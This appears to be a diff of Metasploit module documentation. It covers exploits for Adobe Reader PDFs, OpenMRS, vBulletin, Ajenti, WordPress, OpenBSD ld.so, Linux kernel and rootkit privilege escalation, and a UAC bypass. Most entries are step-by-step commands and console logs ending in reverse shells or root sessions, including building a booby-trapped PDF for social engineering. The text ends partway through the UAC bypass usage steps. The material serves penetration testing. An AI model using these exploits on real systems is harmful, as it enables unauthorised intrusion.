+[!] Payload will be triggered when target opens a Bash terminal
+[!] Don't forget to start your handler:
+[!] msf> handler -H 0.0.0.0 -P 4444 -p cmd/unix/reverse_python
+```
@@ -7,16 +7,16 @@
  The target system must be compiled with `CONFIG_BPF_SYSCALL`
  and must not have `kernel.unprivileged_bpf_disabled` set to 1.

+  Note, this module will overwrite the first few lines
+  of `/etc/crontab` with a new cron job. The job will
+  need to be manually removed.
+

 ## Vulnerable Application

  This module has been tested successfully on:

  * Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)
-  * Ubuntu 16.04 (x64) kernel 4.4.0-38-generic
-  * Ubuntu 16.04 (x64) kernel 4.4.0-42-generic
-  * Ubuntu 16.04 (x64) kernel 4.4.0-98-generic
-  * Ubuntu 16.04 (x64) kernel 4.4.0-140-generic

  This module was not tested against, but may work against:

@@ -17,10 +17,10 @@

  1. Start `msfconsole`
  2. Get a session
-  3. `use exploit/linux/local/rds_priv_esc`
-  4. `set SESSION [SESSION]`
-  5. `check`
-  6. `run`
+  3. Do: ```use exploit/linux/local/rds_rds_page_copy_user_priv_esc```
+  4. Do: ```set SESSION [SESSION]```
+  5. Do: ```check```
+  6. Do: ```run```
  7. You should get a new *root* session


@@ -62,12 +62,12 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m
 ## Scenarios

  ```
-  msf5 > use exploit/linux/local/rds_priv_esc
-  msf5 exploit(linux/local/rds_priv_esc) > set session 1
+  msf5 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc
+  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
  session => 1
-  msf5 exploit(linux/local/rds_priv_esc) > set lhost 172.16.191.188
+  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
-  msf5 exploit(linux/local/rds_priv_esc) > run
+  msf5 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.zEAOL.c' (7282 bytes) ...
@@ -90,3 +90,13 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m
  meterpreter > 
  ```

+## Re-exploitation
+
+The exploit C code utilizes a defined send (`5555`) and receive (`6666`) port, which are opened while the payload is active.
+Attempt to re-exploit while a successful exploit payload is open will result in the error:
+
+```
+[*] Could not bind socket.
+```
+
+However, killing that payload will allow for the exploit to run successfully.
@@ -0,0 +1,81 @@
+## Description
+
+  This module uses Reptile rootkit's `reptile_cmd` backdoor executable
+  to gain root privileges using the `root` command.
+
+
+## Vulnerable Application
+
+  [Reptile](https://github.com/f0rb1dd3n/Reptile) is a Linux Kernel Module (LKM) rootkit.
+
+  The `reptile_cmd` utility, installed to `/reptile` by default, permits elevating privileges
+  to root using the `root` argument.
+
+  This module has been tested successfully with Reptile from `master` branch (2019-03-04) on:
+
+  * Ubuntu 18.04.3 (x64)
+  * Linux Mint 19 (X64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **REPTILE_CMD_PATH**
+
+  Path to `reptile_cmd` executable (default: `/reptile/reptile_cmd`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### Ubuntu 18.04.3 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check
+
+  [+] /reptile/reptile_cmd is executable
+  [*] Output: uid=0(root) gid=0(root) groups=0(root)
+  [+] Reptile is installed and loaded
+  [+] The target is vulnerable.
+  msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] /reptile/reptile_cmd is executable
+  [*] Output: uid=0(root) gid=0(root) groups=0(root)
+  [+] Reptile is installed and loaded
+  [*] Writing '/tmp/.Q53XrrJ3RFy' (207 bytes) ...
+  [*] Executing payload...
+
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.166
+  [*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.166:56736) at 2019-12-08 03:19:01 -0500
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.166
+  OS           : Ubuntu 18.04 (Linux 5.0.0-25-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+
@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+  OpenMRS is an open-source platform that supplies
+  users with a customizable medical record system.
+
+  There exists an object deserialization vulnerability
+  in the `webservices.rest` module used in OpenMRS Platform
+  for versions below `v2.24.0`. Unauthenticated remote code
+  execution can be achieved by sending a malicious XML payload
+  to a Rest API endpoint such as `/ws/rest/v1/concept`.
+
+  Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).
+
+  Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+  8 and Java 9.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/openmrs_deserialization```
+  4. Do: ```set TARGETURI <uri>```
+  5. Do: ```set RHOSTS <ip>```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Scenarios
+
+### OpenMRS Platform `v2.1.2`
+
+  ```
+  msf5 > use exploit/multi/http/openmrs_deserialization
+  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176
+  rhosts => 192.168.37.176
+  msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
+  targeturi => /openmrs-standalone
+  msf5 exploit(multi/http/openmrs_deserialization) > check
+  [*] 192.168.37.176:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
+  msf5 exploit(multi/http/openmrs_deserialization) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Target is running OpenMRS
+  [*] Sending payload...
+  [*] Sending stage (3021284 bytes) to 192.168.37.176
+  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.176:47056) at 2019-12-04 12:18:50 -0600
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.176
+  OS           : Ubuntu 18.04 (Linux 5.0.0-36-generic)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  ```
@@ -0,0 +1,61 @@
+## Introduction
+
+vBulletin 5.x through 5.5.4 allows remote command execution via the `widgetConfig[code]` parameter in an `ajax/render/widget_php` `routestring` `POST` request.
+
+A proof of concept was originally published on [seclist.org](https://seclists.org/fulldisclosure/2019/Sep/31).
+
+```
+msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25
+rhosts => 192.168.1.25
+msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13
+lhost => 192.168.1.13
+msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444 
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Sending stage (38288 bytes) to 192.168.1.25
+[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.25:35772) at 2019-10-18 13:53:39 +0400
+
+meterpreter > 
+```
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/vbulletin_widgetconfig_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set LHOST [IP]`
+6. Do: `run`
+
+## Targets
+
+```
+  Id  Name
+  --  ----
+  0   Automatic (Dropper)
+  1   Linux (Stager)
+  2   Windows (Stager)
+  3   Unix (In-Memory)
+  4   Windows (In-Memory)
+```
+
+## Options
+
+**PHP_CMD**
+
+Specify the PHP function in which you want execute the payload. Default: `shell_exec`
+
+**TARGETURI**
+
+The base URI path of vBulletin. Default: /
+
+## Advanced options
+
+**ForceExploit**
+
+Override check result.
+
+## References
+
+  1. <https://seclists.org/fulldisclosure/2019/Sep/31>
@@ -0,0 +1,102 @@
+## Description
+
+  This module exploits a vulnerability in the OpenBSD `ld.so`
+  dynamic loader (CVE-2019-19726).
+
+  The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
+  environment variable when set with approximately `ARG_MAX` colons.
+
+  This can be abused to load `libutil.so` from an untrusted path,
+  using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
+  executable, resulting in privileged code execution.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * OpenBSD 6.1 (amd64)
+  * OpenBSD 6.6 (amd64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/openbsd/local/dynamic_loader_chpass_privesc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **CHPASS_PATH**
+
+  Path to chpass (default: `/usr/bin/chpass`)
+
+
+## Scenarios
+
+### OpenBSD 6.1 GENERIC#19 amd64
+
+  ```
+  msf5 > use exploit/openbsd/local/dynamic_loader_chpass_privesc 
+  msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set verbose true
+  verbose => true
+  msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set session 1
+  session => 1
+  msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > check
+
+  [+] Patch 013_ldso is not present
+  [+] cc is installed
+  [*] The service is running, but could not be validated.
+  msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > run
+
+  [*] Started reverse TCP double handler on 172.16.191.165:4444 
+  [+] Patch 013_ldso is not present
+  [+] cc is installed
+  [+] Found libutil.so name: libutil.so.12.1
+  [*] Writing '/tmp/.86MXG.c' (316 bytes) ...
+  [*] Max line length is 4096
+  [*] Writing 316 bytes in 1 chunks of 1145 bytes (octal-encoded), using printf
+  [*] Compiling /tmp/libutil.so.12.1 ...
+  [*] Writing '/tmp/.DRbqHJ.c' (602 bytes) ...
+  [*] Max line length is 4096
+  [*] Writing 602 bytes in 1 chunks of 2170 bytes (octal-encoded), using printf
+  [*] Compiling /tmp/.DRbqHJ ...
+  [*] Writing '/tmp/.2bowjnW1' (139 bytes) ...
+  [*] Max line length is 4096
+  [*] Writing 139 bytes in 1 chunks of 470 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [*] Command: echo Y6H5kRiGDyQjzQKI;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket B
+  [*] B: "Y6H5kRiGDyQjzQKI\r\n"
+  [*] Matching...
+  [*] A is input...
+  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.205:43611) at 2019-12-13 04:03:22 -0500
+  [+] Deleted /tmp/.86MXG.c
+  [+] Deleted /tmp/libutil.so.12.1
+  [+] Deleted /tmp/.DRbqHJ.c
+  [+] Deleted /tmp/.DRbqHJ
+  [+] Deleted /tmp/.2bowjnW1
+
+  id
+  uid=0(root) gid=0(wheel) groups=1001(test)
+  uname -a
+  OpenBSD openbsd-6-1.localdomain 6.1 GENERIC#19 amd64
+
+  ```
+
@@ -0,0 +1,53 @@
+## Description
+
+This module exploits a command injection in Ajenti == 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
+
+## Vulnerable Application
+
+This module has been tested with [Ajenti 2.1.31](https://pypi.org/project/ajenti-panel/2.1.31/#files)
+
+## Setup
+
+1. `sudo pip install ajenti-panel==2.1.31 ajenti.plugin.dashboard ajenti.plugin.settings ajenti.plugin.plugins`
+2. `ajenti-panel -v`
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. `use exploit/unix/webapp/ajenti_auth_username_cmd_injection`
+  2. `set RHOSTS <rhost>`
+  3. `set LHOST <lhost>`
+  4. `exploit`
+
+## Options
+
+**RPORT**
+
+Set this to the Ajenti port. The default is 8000.
+
+**TARGETURI**
+
+Set this to the Ajenti base path. The default is `/`.
+
+
+## Scenarios
+
+### Tested Ajenti 2.1.31 on Ubuntu 19.10 x64
+
+```
+msf5 > use exploit/unix/webapp/ajenti_auth_username_cmd_injection
+msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135
+RHOSTS => 172.16.172.135
+msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1
+LHOST => 172.16.172.1
+msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit
+
+[*] Started reverse TCP handler on 172.16.172.1:4444
+[*] Exploiting...
+[*] Sending stage (53755 bytes) to 172.16.172.135
+[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.135:53170) at 2019-11-18 19:51:04 +0300
+
+meterpreter >
+
+```
@@ -0,0 +1,75 @@
+## Description
+
+  This module uses administrative functionality available in WordPress
+  when the Plainview Activity Monitor plugin is installed to
+  gain a shell with web server user permissions.
+
+## Vulnerable Software
+
+  This module has been tested successfully on WordPress 4.6
+  with Plainview Activity Monitor version 20161228 installed.
+
+  Software:
+
+  * https://wordpress.org/plugins/plainview-activity-monitor/
+  * https://wordpress.org/download/releases/
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/wp_plainview_activity_monitor_rce`
+  3. Do: `set rhosts <IP or domain_name>`
+  4. Do: `set username <username>`
+  5. Do: `set password <password>`
+  6. Do: `set vhost <domain_name>`
+  7. Do: `run`
+  8. You should get a new session
+
+## Options
+
+  **TARGETURI**
+
+  The base path to WordPress (default: `/`)
+
+  **USERNAME**
+
+  The username for WordPress
+
+  **PASSWORD**
+
+  The password for WordPress
+
+
+## Scenarios
+
+ ```
+  msf5 > use exploit/unix/webapp/wp_plainview_activity_monitor_rce 
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local
+  rhosts => wordpress.test.local
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin
+  username => admin
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456
+  password => 123456
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local
+  vhost => wordpress.test.local
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   WordPress
+
+
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit
+
+  [*] Started reverse TCP handler on 10.0.0.2:4444 
+  [*] Trying to login...
+  [+] Login Successful
+  [*] Sending stage (38288 bytes) to 10.0.0.3
+  [*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.3:51990) at 2019-11-10 08:24:11 +0100
+
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > 
+ ```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1.
+By creating a specially crafted pdf that a contains malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
+
+### Test results (on Windows XP SP3)
+
+  * reader 7.0.5 - no trigger
+  * reader 7.0.8 - no trigger
+  * reader 7.0.9 - no trigger
+  * reader 7.1.0 - no trigger
+  * reader 7.1.1 - reported not vulnerable
+  * reader 8.0.0 - works
+  * reader 8.1.2 - works
+  * reader 8.1.3 - reported not vulnerable
+  * reader 9.0.0 - works
+  * reader 9.1.0 - reported not vulnerable
+
+## Options
+
+  **FILENAME**
+
+  The file name
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: ```use exploit/windows/fileformat/adobe_geticon```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
+
+## Scenarios
+
+### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_geticon
+  msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
+    FILENAME => icon.pdf
+  msf exploit(windows/fileformat/adobe_geticon) > exploit
+
+    [*] Creating 'icon.pdf' file...
+    [+] icon.pdf stored at /root/.msf4/local/icon.pdf
+  msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
+    [*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
+
+  msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700
+
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+    Installed Applications
+    ======================
+
+     Name            Version
+     ----            -------
+     Adobe Reader 8  8.0.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt
+  ```
@@ -0,0 +1,91 @@
+## Vulnerable Application
+
+This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-2-0)
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: ```use exploit/windows/fileformat/adobe_pdf_embedded_exe```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
+
+## Options
+
+  **EXENAME**
+
+  The Name of payload exe.
+
+  **FILENAME**
+
+  The output filename.
+
+  **INFILENAME**
+
+  The Input PDF filename.
+
+  **LAUNCH_MESSAGE**
+
+  The message to display in the `File:` area of the PDF.
+
+## Scenarios
+
+### Adobe Reader 8.2.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
+
+    [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
+    [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
+    [*] Using 'windows/meterpreter/reverse_tcp' as payload...
+    [+] Parsing Successful. Creating 'evil.pdf' file...
+    [+] evil.pdf stored at /root/.msf4/local/evil.pdf
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
+    [*] exec: cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
+
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1121) at 2019-12-09 14:17:10 -0700
+
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+      Installed Applications
+      ======================
+
+      Name                Version
+      ----                -------
+      Adobe Reader 8.2.0  8.2.0
+
+
+
+    [+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
+      ```
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.
+The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially
+crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory
+used by the invalid pointer issue is controlled.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-9-4-0)
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: ```use exploit/windows/fileformat/adobe_reader_u3d```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use [exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
+
+## Options
+
+  **FILENAME**
+
+  The file name.
+
+  **OBFUSCATE**
+
+  Enable JavaScript obfuscation
+
+## Scenarios
+
+### Adobe Reader 9.4.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_reader_u3d
+  msf exploit(windows/fileformat/adobe_reader_u3d) > set FILENAME myFile.pdf
+    FILENAME => myFile.pdf
+  msf exploit(windows/fileformat/adobe_reader_u3d) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/adobe_reader_u3d) > exploit
+
+    [*] Creating 'myFile.pdf' file...
+    [+] myFile.pdf stored at /root/.msf4/local/myFile.pdf
+  msf exploit(windows/fileformat/adobe_reader_u3d) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf5 exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1103) at 2019-12-05 18:01:07 -0700
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+    Installed Applications
+    ======================
+
+    Name                Version
+    ----                -------
+    Adobe Reader 9.4.0  9.4.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191205180436_default_192.168.1.5_host.application_540854.txt
+  ```
@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially
+crafted pdf that a contains malformed `util.printf()` entry, an attacker may be able to execute arbitrary code.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
+
+## Verification Steps
+
+  1. Install application on the target machine
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/fileformat/adobe_utilprintf```
+  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```exploit```
+  7. Do: ```use exploit/multi/handler```
+  8. Do: ```set LHOST [IP]```
+  9. Do: ```exploit```
+  10. Do: Open PDF on target machine with vulnerable software
+
+## Scenarios
+
+### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_utilprintf
+  msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
+    FILENAME => utilprintf.pdf
+  msf exploit(windows/fileformat/adobe_utilprintf) > exploit
+
+    [*] Creating 'utilprintf.pdf' file...
+    [+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
+  msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700
+
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+    meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+    Installed Applications
+    ======================
+
+    Name            Version
+    ----            -------
+    Adobe Reader 8  8.0.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
+    ```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/ms15_100_mcl_exe`
+3. Do: `set FILENAME [filename.mcl]`
+4. Do: `set FILE_NAME [filename.exe]`
+5. Do: `set payload [windows/meterpreter/reverse_tcp]`
+6. Do: `set SRVHOST [IP]`
+7. Do: `set SRVPORT [number]`
+8. Do: `exploit`
+
+## Options
+
+### FILENAME
+The MCL file.
+
+### FILE_NAME
+The name of the malicious payload to execute.
+
+### FOLDER_NAME
+Share Name (Default: Random).
+
+### SRVHOST
+The local host to listen on. This must be an address on the local machine or 0.0.0.0.
+
+### SRVPORT
+The local port to listen on.
+
+## Scenarios
+
+### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+
+  ```
+  msf > use exploit/windows/fileformat/ms15_100_mcl_exe
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) >  set FILENAME file.mcl
+    FILENAME => file.mcl
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set FILE_NAME file.exe
+    FILE_NAME => file.exe
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
+    PAYLOAD => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > exploit
+    [*] Server started.
+    [*] Malicious executable at \\192.168.1.3\Egoj\file.exe...
+    [*] Creating 'file.mcl' file ...
+    [+] file.mcl stored at /root/.msf4/local/file.mcl
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:49248) at 2019-11-27 10:11:45 -0700
+  ```
@@ -0,0 +1,155 @@
+## Introduction
+
+Microsoft Windows allows for the automatic loading of a profiling COM object during
+the launch of a CLR process based on certain environment variables ostensibly to
+monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
+that will be launched as the profiling thread.  This thread will run at the permission
+level of the calling process, so an auto-elevating process will launch the DLL with
+elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
+process, but others would work, too.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+2. Begin interacting with the module: `use exploit/windows/local/bypassuac_dotnet_profiler`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
